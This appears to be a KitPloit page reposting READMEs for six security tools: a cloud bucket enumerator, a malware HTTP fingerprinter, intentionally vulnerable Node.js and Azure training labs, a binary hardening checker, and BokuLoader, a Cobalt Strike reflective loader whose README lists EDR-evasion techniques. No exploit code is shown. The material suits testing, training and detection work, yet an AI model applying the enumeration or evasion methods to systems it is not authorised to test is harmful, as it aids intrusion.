KitPloit - PenTest Tools!

CloudBrute - Awesome Cloud Enumerator

By: Zion3R — June 25th 2024 at 12:30


A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike.

The complete writeup is available here.


Motivation

We are always thinking about what we can automate to make black-box security testing easier. We discussed the idea of creating a multi-platform cloud brute-force hunter, mainly to find open buckets, apps, and databases hosted on the clouds, and possibly apps behind proxy servers.
Here is the list of issues in previous approaches that we tried to fix:

  • Separated wordlists
  • Lack of proper concurrency
  • Lack of support for all major cloud providers
  • Required authentication, keys, or cloud CLI access
  • Outdated endpoints and regions
  • Incorrect file storage detection
  • No support for proxies (useful for bypassing region restrictions)
  • No support for user-agent randomization (useful for bypassing rare restrictions)
  • Hard to use, poorly configured

Features

  • Cloud detection (IPINFO API and Source Code)
  • Supports all major providers
  • Black-Box (unauthenticated)
  • Fast (concurrent)
  • Modular and easily customizable
  • Cross-platform (Windows, Linux, macOS)
  • User-Agent Randomization
  • Proxy Randomization (HTTP, SOCKS5)

Supported Cloud Providers

Microsoft: - Storage - Apps

Amazon: - Storage - Apps

Google: - Storage - Apps

DigitalOcean: - Storage

Vultr: - Storage

Linode: - Storage

Alibaba: - Storage

Version

1.0.0

Usage

Just download the latest release for your operating system and follow the usage.

To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder containing a config.yaml file.

It looks like this:

providers: ["amazon","alibaba","microsoft","digitalocean","linode","vultr","google"] # supported providers
environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
proxytype: "http" # socks5 / http
ipinfo: "" # IPINFO.io API KEY

For the IPINFO API, you can register and get a free key at IPINFO. The environments are used to generate URL mutations, such as test-keyword.target.region and test.keyword.target.region, etc.
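To illustrate how the environments list expands into candidates, here is a hedged sketch of the kind of keyword mutation involved (the exact patterns CloudBrute generates may differ):

```python
# A hypothetical sketch of environment-based keyword mutation;
# the real CloudBrute mutation logic may differ.
keyword = "target"
environments = ["test", "dev", "prod", "stage", "staging", "bak"]

candidates = []
for env in environments:
    candidates.append(f"{env}-{keyword}")   # e.g. test-target
    candidates.append(f"{env}.{keyword}")   # e.g. test.target
    candidates.append(f"{keyword}-{env}")   # e.g. target-test

print(candidates[:6])
```

Each candidate would then be combined with provider-specific endpoints and regions to form the URLs that are probed.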

We provide some wordlists out of the box, but it's better to customize and minimize your wordlists (based on your recon) before running the tool.

After setting up your API key, you are ready to use CloudBrute.

 β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—      β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β•šβ•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•”β•β•β•β•β•
β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β•
β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β•šβ•β•β•β•β•β•β•šβ•β•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β•β•β•β•β•β•
V 1.0.7
usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
-w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
<integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
[-a|--randomagent "<value>"] [-D|--debug] [-q|--quite]
[-m|--mode "<value>"] [-o|--output "<value>"]
[-C|--configFolder "<value>"]

Awesome Cloud Enumerator

Arguments:

-h --help Print help information
-d --domain domain
-k --keyword keyword used to generator urls
-w --wordlist path to wordlist
-c --cloud force a search, check config.yaml providers list
-t --threads number of threads. Default: 80
-T --timeout timeout per request in seconds. Default: 10
-p --proxy use proxy list
-a --randomagent user agent randomization
-D --debug show debug logs. Default: false
-q --quite suppress all output. Default: false
-m --mode storage or app. Default: storage
-o --output Output file. Default: out.txt
-C --configFolder Config path. Default: config


For example:

CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

Please note that the -k keyword is used to generate URLs, so if you want the full domain to be part of the mutation, use it for both the domain (-d) and keyword (-k) arguments.

If a cloud provider is not detected, or you want to force searching on a specific provider, you can use the -c option.

CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w "./data/storage_small.txt" -c amazon -o target_output.txt

Dev

  • Clone the repo
  • go build -o CloudBrute main.go
  • go test internal

In action

How to contribute

  • Add a module or fix something, then open a pull request.
  • Share it with whomever you believe can use it.
  • Do the extra work and share your findings with the community ♥

FAQ

How to make the best out of this tool?

Read the usage.

I get errors; what should I do?

Make sure you read the usage correctly, and if you think you found a bug, open an issue.

When I use proxies, I get too many errors, or it's too slow?

That's because you are using public proxies; use private, higher-quality proxies instead. You can use ProxyFor to verify which proxies work with your chosen provider.

Too fast or too slow?

Change the -T (timeout) option to get the best results for your run.

Credits

Inspired by every single repo listed here.




Hfinger - Fingerprinting HTTP Requests

By: Zion3R — June 24th 2024 at 12:30


Tool for Fingerprinting HTTP requests of malware. Based on Tshark and written in Python3. Working prototype stage :-)

Its main objective is to provide unique representations (fingerprints) of malware requests, which help in their identification. Unique means here that each fingerprint should be seen in only one particular malware family, yet one family can have multiple fingerprints. Hfinger represents the request in a shorter form than printing the whole request, but one that is still human-interpretable.

Hfinger can be used in manual malware analysis but also in sandbox systems or SIEMs. The generated fingerprints are useful for grouping requests, pinpointing requests to particular malware families, identifying different operations of one family, or discovering unknown malicious requests omitted by other security systems but which share a fingerprint.

An academic paper accompanies work on this tool, describing, for example, the motivation of design choices, and the evaluation of the tool compared to p0f, FATT, and Mercury.


    The idea

    The basic assumption of this project is that HTTP requests of different malware families are more or less unique, so they can be fingerprinted to provide some sort of identification. Hfinger retains information about the structure and values of some headers to provide means for further analysis, for example, grouping of similar requests; at this moment, that is still a work in progress.

    After analysis of malware's HTTP requests and headers, we have identified some parts of requests as being most distinctive. These include:

    • Request method
    • Protocol version
    • Header order
    • Popular headers' values
    • Payload length, entropy, and presence of non-ASCII characters

    Additionally, some standard features of the request URL were also considered. All these parts were translated into a set of features, described in detail here.

    The above features are translated into a varying-length representation, which is the actual fingerprint. Depending on the report mode, different features are used to fingerprint requests. More information on these modes is presented below. The feature selection process will be described in the forthcoming academic paper.

    Installation

    Minimum requirements needed before installation:

    • Python >= 3.3
    • Tshark >= 2.2.0

    Installation available from PyPI:

    pip install hfinger

    Hfinger has been tested on Xubuntu 22.04 LTS with tshark package in version 3.6.2, but should work with older versions like 2.6.10 on Xubuntu 18.04 or 3.2.3 on Xubuntu 20.04.

    Please note that, as with any PoC, you should run Hfinger in a separate environment, at least within a Python virtual environment. Its setup is not covered here, but you can try this tutorial.

    Usage

    After installation, you can call the tool directly from a command line with hfinger or as a Python module with python -m hfinger.

    For example:

    foo@bar:~$ hfinger -f /tmp/test.pcap
    [{"epoch_time": "1614098832.205385000", "ip_src": "127.0.0.1", "ip_dst": "127.0.0.1", "port_src": "53664", "port_dst": "8080", "fingerprint": "2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4"}]

    Help can be displayed with short -h or long --help switches:

    usage: hfinger [-h] (-f FILE | -d DIR) [-o output_path] [-m {0,1,2,3,4}] [-v]
    [-l LOGFILE]

    Hfinger - fingerprinting malware HTTP requests stored in pcap files

    optional arguments:
    -h, --help show this help message and exit
    -f FILE, --file FILE Read a single pcap file
    -d DIR, --directory DIR
    Read pcap files from the directory DIR
    -o output_path, --output-path output_path
    Path to the output directory
    -m {0,1,2,3,4}, --mode {0,1,2,3,4}
    Fingerprint report mode.
    0 - similar number of collisions and fingerprints as mode 2, but using fewer features,
    1 - representation of all designed features, but a little more collisions than modes 0, 2, and 4,
    2 - optimal (the default mode),
    3 - the lowest number of generated fingerprints, but the highest number of collisions,
    4 - the highest fingerprint entropy, but slightly more fingerprints than modes 0-2
    -v, --verbose Report information about non-standard values in the request
    (e.g., non-ASCII characters, no CRLF tags, values not present in the configuration list).
    Without --logfile (-l) will print to the standard error.
    -l LOGFILE, --logfile LOGFILE
    Output logfile in the verbose mode. Implies -v or --verbose switch.

    You must provide a path to a pcap file (-f), or a directory (-d) with pcap files. The output is in JSON format. It will be printed to standard output or to the provided directory (-o) using the name of the source file. For example, output of the command:

    hfinger -f example.pcap -o /tmp/pcap

    will be saved to:

    /tmp/pcap/example.pcap.json

    The report mode -m/--mode can be used to change the default report mode by providing an integer in the range 0-4. The modes differ in the represented request features and rounding. The default mode (2) was chosen by us to represent all features that are usually used during requests' analysis, while also offering a low number of collisions and generated fingerprints. With other modes, you can achieve different goals. For example, in mode 3 you get a lower number of generated fingerprints but a higher chance of a collision between malware families. If you are unsure, you don't have to change anything. More information on report modes is here.

    Beginning with version 0.2.1, Hfinger is less verbose. You should use -v/--verbose if you want to receive information about encountered non-standard values of headers, non-ASCII characters in the non-payload part of the request, lack of CRLF tags (\r\n\r\n), and other problems with analyzed requests that are not application errors. When any such issues are encountered in the verbose mode, they will be printed to the standard error output. You can also save the log to a defined location using the -l/--logfile switch (it implies -v/--verbose). The log data will be appended to the log file.

    Using hfinger in a Python application

    Beginning with version 0.2.0, Hfinger supports being imported into other Python applications. To use it in your app, simply import the hfinger_analyze function from hfinger.analysis and call it with a path to the pcap file and the reporting mode. The returned result is a list of dicts with fingerprinting results.

    For example:

    from hfinger.analysis import hfinger_analyze

    pcap_path = "SPECIFY_PCAP_PATH_HERE"
    reporting_mode = 4
    print(hfinger_analyze(pcap_path, reporting_mode))

    Beginning with version 0.2.1, Hfinger uses the logging module to log information about encountered non-standard values of headers, non-ASCII characters in the non-payload part of the request, lack of CRLF tags (\r\n\r\n), and other problems with analyzed requests that are not application errors. Hfinger creates its own logger named hfinger, but without prior configuration this log information is in practice discarded. If you want to receive it, before calling hfinger_analyze you should configure the hfinger logger: set the log level to logging.INFO, configure a log handler to your needs, and add it to the logger. More information is available in the hfinger_analyze function docstring.
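    Following that description, a minimal logger setup might look like this (the handler and format below are illustrative choices, not Hfinger's defaults):

```python
import logging

# Configure the "hfinger" logger before calling hfinger_analyze;
# without a handler and an INFO level, the log records are
# effectively discarded.
logger = logging.getLogger("hfinger")
logger.setLevel(logging.INFO)
handler = logging.StreamHandler()  # or logging.FileHandler(...)
handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
logger.addHandler(handler)
```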

    Fingerprint creation

    A fingerprint is based on features extracted from a request. Usage of particular features from the full list depends on the chosen report mode from a predefined list (more information on report modes is here). The figure below represents the creation of an exemplary fingerprint in the default report mode.

    Three parts of the request are analyzed to extract information: URI, headers' structure (including method and protocol version), and payload. Particular features of the fingerprint are separated using | (pipe). The final fingerprint generated for the POST request from the example is:

    2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4

    The creation of features is described below in the order of appearance in the fingerprint.

    Firstly, URI features are extracted:

    • URI length, represented as the base-10 logarithm of the length, rounded to an integer (in the example the URI is 43 characters long, so log10(43) ≈ 2),
    • number of directories (in the example there are 3 directories),
    • average directory length, represented as the base-10 logarithm of the actual average directory length, rounded to an integer (in the example the three directories have a total length of 20 characters (6+6+8), so log10(20/3) ≈ 1),
    • extension of the requested file, but only if it is on the list of known extensions in hfinger/configs/extensions.txt,
    • average value length, represented as the base-10 logarithm of the actual average value length, rounded to one decimal place (in the example the two values are both 4 characters long, so the average is 4 and log10(4) ≈ 0.6).
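    The rounding in those URI features can be reproduced with a few lines of Python (a sketch of the arithmetic from the example above, not Hfinger's actual code):

```python
from math import log10

# Example request: URI of 43 characters, 3 directories totalling
# 20 characters, and two variable values of 4 characters each.
uri_len = round(log10(43))          # -> 2
num_dirs = 3
avg_dir_len = round(log10(20 / 3))  # -> 1
avg_val_len = round(log10(4), 1)    # -> 0.6

print(uri_len, num_dirs, avg_dir_len, avg_val_len)
```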

    Secondly, header structure features are analyzed:

    • request method, encoded as the first two letters of the method (PO),
    • protocol version, encoded as an integer (1 for version 1.1, 0 for version 1.0, and 9 for version 0.9),
    • order of the headers,
    • and popular headers and their values.

    To represent order of the headers in the request, each header's name is encoded according to the schema in hfinger/configs/headerslow.json, for example, User-Agent header is encoded as us-ag. Encoded names are separated by ,. If the header name does not start with an upper case letter (or any of its parts when analyzing compound headers such as Accept-Encoding), then encoded representation is prefixed with !. If the header name is not on the list of the known headers, it is hashed using FNV1a hash, and the hash is used as encoding.
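    The FNV1a fallback for unknown header names can be illustrated as follows (a standard 32-bit FNV-1a sketch; the exact hash width and formatting Hfinger uses are assumptions here):

```python
def fnv1a_32(data: bytes) -> int:
    # Standard 32-bit FNV-1a: XOR each byte into the hash,
    # then multiply by the FNV prime, modulo 2**32.
    h = 0x811C9DC5  # FNV offset basis
    for b in data:
        h ^= b
        h = (h * 0x01000193) & 0xFFFFFFFF  # FNV prime
    return h

# A header name not present in headerslow.json would be replaced
# by its hash ("X-Custom-Header" is a hypothetical example):
print(format(fnv1a_32(b"X-Custom-Header"), "08x"))
```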

    When analyzing popular headers, the request is checked for their presence. These headers are:

    • Connection
    • Accept-Encoding
    • Content-Encoding
    • Cache-Control
    • TE
    • Accept-Charset
    • Content-Type
    • Accept
    • Accept-Language
    • User-Agent

    When the header is found in the request, its value is checked against a table of typical values to create pairs of header_name_representation:value_representation. The name of the header is encoded according to the schema in hfinger/configs/headerslow.json (as presented before), and the value is encoded according to schema stored in hfinger/configs directory or configs.py file, depending on the header. In the above example Accept is encoded as ac and its value */* as as-as (asterisk-asterisk), giving ac:as-as. The pairs are inserted into fingerprint in order of appearance in the request and are delimited using /. If the header value cannot be found in the encoding table, it is hashed using the FNV1a hash.
    If the header value is composed of multiple values, they are tokenized to provide a list of values delimited with ,, for example, Accept: */*, text/* would give ac:as-as,te-as. However, at this point of development, if the header value contains a "quality value" tag (q=), then the whole value is encoded with its FNV1a hash. Finally, values of User-Agent and Accept-Language headers are directly encoded using their FNV1a hashes.

    Finally, the payload features:

    • presence of non-ASCII characters, represented with the letter N, and with A otherwise,
    • payload's Shannon entropy, rounded to an integer,
    • and payload length, represented as the base-10 logarithm of the actual payload length, rounded to one decimal place.
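    These three payload features can be sketched in Python (an illustration of the description above, not Hfinger's actual implementation):

```python
from collections import Counter
from math import log10, log2

def payload_features(payload: bytes):
    # "A" if the payload is pure ASCII, "N" otherwise.
    ascii_flag = "A" if all(b < 128 for b in payload) else "N"
    # Shannon entropy over byte frequencies, rounded to an integer.
    counts = Counter(payload)
    entropy = -sum((c / len(payload)) * log2(c / len(payload))
                   for c in counts.values())
    # Payload length as a base-10 log, rounded to one decimal place.
    return ascii_flag, round(entropy), round(log10(len(payload)), 1)

print(payload_features(b"field=value&other=1234"))
```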

    Report modes

    Hfinger operates in five report modes, which differ in the features represented in the fingerprint, and thus in the information extracted from requests. These are (with the number used in the tool configuration):

    • mode 0 - producing a similar number of collisions and fingerprints as mode 2, but using fewer features,
    • mode 1 - representing all designed features, but producing a little more collisions than modes 0, 2, and 4,
    • mode 2 - optimal (the default mode), representing all features which are usually used during requests' analysis, but also offering a low number of collisions and generated fingerprints,
    • mode 3 - producing the lowest number of generated fingerprints from all modes, but achieving the highest number of collisions,
    • mode 4 - offering the highest fingerprint entropy, but also generating slightly more fingerprints than modes 0-2.

    The modes were chosen to optimize Hfinger's ability to uniquely identify malware families versus the number of generated fingerprints. Modes 0, 2, and 4 offer a similar number of collisions between malware families; however, mode 4 generates a few more fingerprints than the other two. Mode 2 represents more request features than mode 0 with a comparable number of generated fingerprints and collisions. Mode 1 is the only one representing all designed features, but it increases the number of collisions by almost two times compared to modes 0, 2, and 4. Mode 3 produces at least two times fewer fingerprints than the other modes, but it introduces about nine times more collisions. A description of all designed features is here.

    The modes consist of the following features (in the order of appearance in the fingerprint):

    • mode 0:
      • number of directories,
      • average directory length represented as an integer,
      • extension of the requested file,
      • average value length represented as a float,
      • order of headers,
      • popular headers and their values,
      • payload length represented as a float.
    • mode 1:
      • URI length represented as an integer,
      • number of directories,
      • average directory length represented as an integer,
      • extension of the requested file,
      • variable length represented as an integer,
      • number of variables,
      • average value length represented as an integer,
      • request method,
      • version of protocol,
      • order of headers,
      • popular headers and their values,
      • presence of non-ASCII characters,
      • payload entropy represented as an integer,
      • payload length represented as an integer.
    • mode 2:
      • URI length represented as an integer,
      • number of directories,
      • average directory length represented as an integer,
      • extension of the requested file,
      • average value length represented as a float,
      • request method,
      • version of protocol,
      • order of headers,
      • popular headers and their values,
      • presence of non-ASCII characters,
      • payload entropy represented as an integer,
      • payload length represented as a float.
    • mode 3:
      • URI length represented as an integer,
      • average directory length represented as an integer,
      • extension of the requested file,
      • average value length represented as an integer,
      • order of headers.
    • mode 4:
      • URI length represented as a float,
      • number of directories,
      • average directory length represented as a float,
      • extension of the requested file,
      • variable length represented as a float,
      • average value length represented as a float,
      • request method,
      • version of protocol,
      • order of headers,
      • popular headers and their values,
      • presence of non-ASCII characters,
      • payload entropy represented as a float,
      • payload length represented as a float.




    VulnNodeApp - A Vulnerable Node.Js Application

    By: Zion3R — June 23rd 2024 at 12:30


    A vulnerable application built with Node.js, the Express server, and the EJS template engine. This application is meant for educational purposes only.


    Setup

    Clone this repository

    git clone https://github.com/4auvar/VulnNodeApp.git

    Application setup:

    • Install the latest Node.js version with npm.
    • Open a terminal/command prompt and navigate to the location of the downloaded/cloned repository.
    • Run the command: npm install

    DB setup

    • Install and configure the latest MySQL version and start the MySQL service/daemon
    • Log in as the root user in MySQL and run the below SQL script:
    CREATE USER 'vulnnodeapp'@'localhost' IDENTIFIED BY 'password';
    create database vuln_node_app_db;
    GRANT ALL PRIVILEGES ON vuln_node_app_db.* TO 'vulnnodeapp'@'localhost';
    USE vuln_node_app_db;
    create table users (id int AUTO_INCREMENT PRIMARY KEY, fullname varchar(255), username varchar(255),password varchar(255), email varchar(255), phone varchar(255), profilepic varchar(255));
    insert into users(fullname,username,password,email,phone) values("test1","test1","test1","test1@test.com","976543210");
    insert into users(fullname,username,password,email,phone) values("test2","test2","test2","test2@test.com","9887987541");
    insert into users(fullname,username,password,email,phone) values("test3","test3","test3","test3@test.com","9876987611");
    insert into users(fullname,username,password,email,phone) values("test4","test4","test4","test4@test.com","9123459876");
    insert into users(fullname,username,password,email,phone) values("test5","test5","test 5","test5@test.com","7893451230");

    Set basic environment variable

    • The user needs to set the below environment variables.
      • DATABASE_HOST (E.g: localhost, 127.0.0.1, etc...)
      • DATABASE_NAME (E.g: vuln_node_app_db or DB name you change in above DB script)
      • DATABASE_USER (E.g: vulnnodeapp or user name you change in above DB script)
      • DATABASE_PASS (E.g: password or password you change in above DB script)

    Start the server

    • Open the command prompt/terminal and navigate to the location of your repository
    • Run command: npm start
    • Access the application at http://localhost:3000

    Vulnerability covered

    • SQL Injection
    • Cross Site Scripting (XSS)
    • Insecure Direct Object Reference (IDOR)
    • Command Injection
    • Arbitrary File Retrieval
    • Regular Expression Injection
    • XML External Entity (XXE) Injection
    • Node.js Deserialization
    • Security Misconfiguration
    • Insecure Session Management

    TODO

    • Will add new vulnerabilities such as CORS, Template Injection, etc...
    • Improve application documentation

    Issues

    • In case of bugs in the application, feel free to create an issue on GitHub.

    Contribution

    • Feel free to create a pull request for any contribution.

    You can reach me at @4auvar




    XMGoat - Composed of XM Cyber terraform templates that help you learn about common Azure security issues

    By: Zion3R — June 22nd 2024 at 12:30


    XM Goat is composed of XM Cyber terraform templates that help you learn about common Azure security issues. Each template is a vulnerable environment, with some significant misconfigurations. Your job is to attack and compromise the environments.

    Here's what to do for each environment:

    1. Run installation and then get started.

    2. With the initial user and service principal credentials, attack the environment based on the scenario flow (for example, XMGoat/scenarios/scenario_1/scenario1_flow.png).

    3. If you need help with your attack, refer to the solution (for example, XMGoat/scenarios/scenario_1/solution.md).

    4. When you're done learning the attack, clean up.


    Requirements

    • Azure tenant
    • Terraform version 1.0.9 or above
    • Azure CLI
    • Azure User with Owner permissions on Subscription and Global Admin privileges in AAD

    Installation

    Run these commands:

    $ az login
    $ git clone https://github.com/XMCyber/XMGoat.git
    $ cd XMGoat
    $ cd scenarios
    $ cd scenario_<SCENARIO>

    Where <SCENARIO> is the scenario number you want to complete.

    $ terraform init
    $ terraform plan -out <FILENAME>
    $ terraform apply <FILENAME>

    Where <FILENAME> is the name of the output file.

    Get started

    To get the initial user and service principal credentials, run the following query:

    $ terraform output --json

    For Service Principals, use application_id.value and application_secret.value.

    For Users, use username.value and password.value.
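    For instance, the credentials can be pulled out of that JSON programmatically (a sketch; the document below is illustrative sample data, only the key names follow the outputs mentioned above):

```python
import json

# Illustrative sample of `terraform output --json` (values are fake).
raw = """{
  "application_id": {"value": "app-id-example"},
  "application_secret": {"value": "app-secret-example"},
  "username": {"value": "user@example.onmicrosoft.com"},
  "password": {"value": "example-password"}
}"""

outputs = json.loads(raw)
sp_creds = (outputs["application_id"]["value"],
            outputs["application_secret"]["value"])
user_creds = (outputs["username"]["value"],
              outputs["password"]["value"])
print(sp_creds, user_creds)
```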

    Cleaning up

    After completing the scenario, run the following commands in order to clean up all the resources created in your tenant:

    $ az login
    $ cd XMGoat
    $ cd scenarios
    $ cd scenario_<SCENARIO>

    Where <SCENARIO> is the scenario number you completed.

    $ terraform destroy



    Extrude - Analyse Binaries For Missing Security Features, Information Disclosure And More...

    By: Zion3R — June 21st 2024 at 12:30


    Analyse binaries for missing security features, information disclosure and more.

    Extrude is in the early stages of development, and currently only supports ELF and MachO binaries. PE (Windows) binaries will be supported soon.


    Usage

    Usage:
    extrude [flags] [file]

    Flags:
    -a, --all Show details of all tests, not just those which failed.
    -w, --fail-on-warning Exit with a non-zero status even if only warnings are discovered.
    -h, --help help for extrude

    Docker

    You can optionally run extrude with docker via:

    docker run -v `pwd`:/blah -it ghcr.io/liamg/extrude /blah/targetfile

    Supported Checks

    ELF

    • PIE
    • RELRO
    • BIND NOW
    • Fortified Source
    • Stack Canary
    • NX Stack

    MachO

    • PIE
    • Stack Canary
    • NX Stack
    • NX Heap
    • ARC

    Windows

    Coming soon...

    TODO

    • Add support for PE
    • Add secret scanning
    • Detect packers



    BokuLoader - A Proof-Of-Concept Cobalt Strike Reflective Loader Which Aims To Recreate, Integrate, And Enhance Cobalt Strike's Evasion Features!

    By: Zion3R — June 20th 2024 at 15:41


    A proof-of-concept User-Defined Reflective Loader (UDRL) which aims to recreate, integrate, and enhance Cobalt Strike's evasion features!


    Contributors:

    Contributor Twitter Notable Contributions
    Bobby Cooke @0xBoku Project original author and maintainer
    Santiago Pecin @s4ntiago_p Reflective Loader major enhancements
    Chris Spehn @ConsciousHacker Aggressor scripting
    Joshua Magri @passthehashbrwn IAT hooking
    Dylan Tran @d_tranman Reflective Call Stack Spoofing
    James Yeung @5cript1diot Indirect System Calls

    UDRL Usage Considerations

    The built-in Cobalt Strike reflective loader is robust, handling all the Malleable PE evasion features Cobalt Strike has to offer. The major disadvantage of using a custom UDRL is that Malleable PE evasion features may or may not be supported out-of-the-box.

    The objective of the public BokuLoader project is to assist red teams in creating their own in-house Cobalt Strike UDRL. The project aims to support all worthwhile CS Malleable PE evasion features. Some evasion features leverage CS integration, others have been recreated completely, and some are unsupported.

    Before using this project in any form, you should properly test that the evasion features are working as intended. Between the C code and the Aggressor script, compilation with different versions of operating systems, compilers, and Java may return different results.

    Evasion Features

    BokuLoader Specific Evasion Features

    • Reflective callstack spoofing via synthetic frames.
    • Custom ASM/C reflective loader code
    • Indirect NT syscalls via HellsGate & HalosGate techniques
    • All memory protection changes for all allocation options are done via indirect syscall to NtProtectVirtualMemory
    • obfuscate "true" with custom UDRL Aggressor script implementation.
    • NOHEADERCOPY
    • The loader will not copy the raw beacon DLL's headers to the virtual beacon DLL. The first 0x1000 bytes will be nulls.
    • XGetProcAddress for resolving symbols
    • Does not use Kernel32.GetProcAddress
    • xLoadLibrary for resolving DLL's base address & DLL Loading
    • For loaded DLLs, gets DLL base address from TEB->PEB->PEB_LDR_DATA->InMemoryOrderModuleList
    • Does not use Kernel32.LoadLibraryA
    • Caesar Cipher for string obfuscation
    • 100k UDRL Size
    • Import DLL names and import entry name strings are stomped in virtual beacon DLL.

    Supported Malleable PE Evasion Features

    Command | Option(s) | Supported
    allocator | HeapAlloc, MapViewOfFile, VirtualAlloc | All supported via BokuLoader implementation
    module_x64 | string (DLL name) | Supported via BokuLoader implementation. Same DLL stomping requirements as CS implementation apply
    obfuscate | true/false | HTTP/S beacons supported via BokuLoader implementation. SMB/TCP is currently not supported for obfuscate true. Details in issue. Accepting help if you can fix :)
    entry_point | RVA as decimal number | Supported via BokuLoader implementation
    cleanup | true | Supported via CS integration
    userwx | true/false | Supported via BokuLoader implementation
    sleep_mask | (true/false) or (Sleepmask Kit+true) | Supported. When using default "sleepmask true" (without sleepmask kit) set "userwx true". When using a sleepmask kit which supports RX beacon .text memory (src47/Ekko) set "sleepmask true" and "userwx false".
    magic_mz_x64 | 4-char string | Supported via CS integration
    magic_pe | 2-char string | Supported via CS integration
    transform-x64 prepend | escaped hex string | BokuLoader.cna Aggressor script modification
    transform-x64 strrep | string string | BokuLoader.cna Aggressor script modification
    stomppe | true/false | Unsupported. BokuLoader does not copy beacon DLL headers over. First 0x1000 bytes of virtual beacon DLL are 0x00
    checksum | number | Experimental. BokuLoader.cna Aggressor script modification
    compile_time | date-time string | Experimental. BokuLoader.cna Aggressor script modification
    image_size_x64 | decimal value | Unsupported
    name | string | Experimental. BokuLoader.cna Aggressor script modification
    rich_header | escaped hex string | Experimental. BokuLoader.cna Aggressor script modification
    stringw | string | Unsupported
    string | string | Unsupported

    Test

    Project Origins

    Usage

    1. Compile the BokuLoader Object file with make
    2. Start your Cobalt Strike Team Server
    3. Within Cobalt Strike, import the BokuLoader.cna Aggressor script
    4. Generate the x64 beacon (Attacks -> Packages -> Windows Executable (S))
    5. Use the Script Console to ensure BokuLoader was implemented in the beacon build

    Notes:

    • BokuLoader does not support the x86 option. The x86 bin is the original Reflective Loader object file.
    • Generating RAW beacons works out of the box. When using the Artifact Kit for the beacon loader, the stagesize variable must be larger than the default.
    • See the Cobalt Strike User-Defined Reflective Loader documentation for additional information.

    Detection Guidance

    Hardcoded Strings

    • BokuLoader changes some commonly detected strings to new hardcoded values. These strings can be used to signature BokuLoader:

    Original Cobalt Strike String | BokuLoader String
    ReflectiveLoader | BokuLoader
    Microsoft Base Cryptographic Provider v1.0 | 12367321236742382543232341241261363163151d
    (admin) | (tomin)
    beacon | bacons
